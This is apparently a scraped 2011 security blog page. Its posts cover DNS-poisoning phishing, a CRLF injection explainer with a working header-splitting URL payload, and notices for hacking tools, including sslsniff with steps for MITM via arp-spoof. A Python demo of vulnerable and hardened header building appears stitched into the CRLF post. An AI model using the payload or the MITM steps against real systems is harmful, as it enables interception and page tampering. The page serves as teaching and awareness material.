"In such a situation, phishers do not need to blast e-mails to random Brazilian e-mail accounts. They just need to wait for the Santander customers to login into their bank account, when accessing the site via the poisoned DNS servers," Zscaler's Julien Sobrier explains.
This type of phishing attack is very hard to detect and block. Victims have no indication that they are on a different website.
Fortunately, the affected DNS servers have been cleaned up and are now functioning properly. The number of potentially affected users is not known.


Source: Softpedia News

CRLF injection attack and HTTP response splitting

Posted by Deepanker Verma 0 comments
CRLF injection, also known as HTTP response splitting, is a simple but very powerful web attack. Hackers actively exploit this web application vulnerability to perform a large variety of serious attacks. It was also found in Google AdWords some years ago.
The term CRLF refers to Carriage Return (ASCII 13, \r) and Line Feed (ASCII 10, \n). They are used to mark the end of a line, but today's popular operating systems handle them differently. For example, in Windows both a CR and an LF are required to mark the end of a line, whereas in Linux/UNIX only an LF is required. Together, these two characters represent the END OF LINE for various internet protocols. Web applications and the software that processes HTTP split headers wherever a CRLF is found. If a malicious user is able to inject his own CRLF sequence into an HTTP stream, he is able to maliciously control the way a web application functions.


Example:


Suppose you get a link like this from a malicious user:


http://www.yoursite.com/page.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3Ethis is the Hacker's Content%3C/html%3E


You will get a page saying:
this is the Hacker's Content


But this page is generated by the server, into whose response the hacker has injected HTML code. More sophisticated variations of this example can lead to poisoning of the client's web cache, cookie manipulation, XSS, temporary or permanent defacement of web pages and even information theft.


Preventing CRLF


The best protection is filtering user input. Properly sanitize URLs that point to web pages on your site containing any server redirection code.
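The header split described above, next to a hardened version, as an added example that is not code from the original post. It assumes a hypothetical handler that copies the page parameter into a Location header; the function names and the payload (modelled on the article's link) are constructed for illustration.

```python
from urllib.parse import unquote


def build_redirect_unsafe(page):
    """Vulnerable: the request parameter is copied into a header verbatim."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: /{page}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def build_redirect_safe(page):
    """Hardened: reject CR, LF and every other control character."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in page):
        raise ValueError("control character in header value")
    return build_redirect_unsafe(page)


def parse_response(raw):
    """Read the response as a client does: headers stop at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.decode("latin-1").split("\r\n")[1:], body


# Constructed input modelled on the article's link, URL-decoded the way the
# web server decodes the query string before the application sees it.
PAYLOAD = unquote("%0d%0aContent-Type: text/html%0d%0a%0d%0a"
                  "%3Chtml%3Einjected%3C/html%3E")


def demo():
    """Return (headers, body) as seen by the client, plus the hardened outcome."""
    headers, body = parse_response(build_redirect_unsafe(PAYLOAD))
    try:
        build_redirect_safe(PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return headers, body, blocked


if __name__ == "__main__":
    headers, body, blocked = demo()
    print("headers seen by client:", headers)
    print("body seen by client:   ", body)
    print("hardened builder rejected the value:", blocked)
```

In the unsafe output the server's own Content-Length header ends up inside the body, because the injected blank line ended the header block early.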

Mantra Security Toolkit 0.6.1 Released – Browser Based Hacking Framework

Posted by Deepanker Verma Monday, July 18, 2011 0 comments


Mantra is a collection of free and open source tools integrated into a web browser, which can come in handy for students, penetration testers, web application developers, security professionals, etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.


The software is light, flexible, portable and user friendly, with a nice graphical user interface. You can carry it on memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.


Mantra can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.




Download Here:
http://getmantra.com/download/index.html

PuTTY V.0.61 released

Posted by Deepanker Verma 0 comments


PuTTY 0.61 is out, after over four years, with new features, bug fixes, and compatibility updates for Windows 7 and various SSH server software.


PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator.


LEGAL WARNING: Use of PuTTY, PSCP, PSFTP and Plink is illegal in countries where encryption is outlawed. I believe it is legal to use PuTTY, PSCP, PSFTP and Plink in England and Wales and in many other countries, but I am not a lawyer and so if in doubt you should seek legal advice before downloading it. You may find this site useful (it's a survey of cryptography laws in many countries) but I can't vouch for its correctness.


These features are new in beta 0.61: 
Kerberos/GSSAPI authentication in SSH-2. 
Local X11 authorisation support on Windows. (Unix already had it, of course.) 
Support for non-fixed-width fonts on Windows. 
GTK 2 support on Unix. 
Specifying the logical host name independently of the physical network address to connect to. 
Crypto and flow control optimisations. 
Support for the zlib@openssh.com SSH-2 compression method. 
Support for new Windows 7 UI features: Aero resizing and jump lists. 
Support for OpenSSH AES-encrypted private key files in PuTTYgen. 
Bug fix: handles OpenSSH private keys with primes in either order. 
Bug fix: corruption of port forwarding is fixed (we think). 
Bug fix: various crashes and hangs when exiting on failure.
Bug fix: hang in the serial back end on Windows. 
Bug fix: Windows clipboard is now read asynchronously, in case of deadlock due to the clipboard owner being at the far end of the same PuTTY's network connection (either via X forwarding or via tunnelled rdesktop). 


Download
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

download WPScan | WordPress Security Scanner

Posted by Deepanker Verma Saturday, July 16, 2011 0 comments


Introduction
WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach.


Details
Username enumeration (from author querystring and location header)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (2220 most popular by default)
Plugin vulnerability enumeration (based on version) (todo)
Plugin enumeration list generation
Other misc WordPress checks (theme name, dir listing, ...)


Download Here:
http://code.google.com/p/wpscan/downloads/list

How to Hack Twitter Account

Posted by Deepanker Verma Monday, July 11, 2011 2 comments

Many readers have sent me emails asking for a post on Twitter account hacking. Before writing more on the topic, I want to say one thing: there is no software tool that can give you the password of a Twitter account just by entering the user name. If you are here for this type of software, then please leave this website.

sslsniff v0.7 – SSL Man-In-The-Middle (MITM) Tool

Posted by Deepanker Verma Sunday, July 10, 2011 0 comments


This tool was originally written to demonstrate and exploit IE’s vulnerability to a specific “basicConstraints” man-in-the-middle attack. While Microsoft has since fixed the vulnerability that allowed leaf certificates to act as signing certificates, this tool is still occasionally useful for other purposes.
It is designed to MITM all SSL connections on a LAN and dynamically generates certs for the domains that are being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that you provide.


The three steps to get this running are:

  1. Download and run sslsniff-0.7.tar.gz
  2. Setup iptables
  3. Run arp-spoof



Download Here:
http://www.thoughtcrime.org/software/sslsniff/sslsniff-0.7.tar.gz
About Me

Deepanker Verma
I am Deepanker Verma, a computer geek, security researcher, blogger and software developer. I have a deep interest in information security and web development and try to learn new things. You will see my blogs on hackingtricks, TechlomediaWebtips and Usethistip.

I was also honoured by Apple, Ebay, Symantec, PandaSecurity and various other computer software giants for my security work for their company. I also contribute on some opensource projects regularly.

I also own a web app called NoteDIP that allows users to send self-destructive messages with password protection.
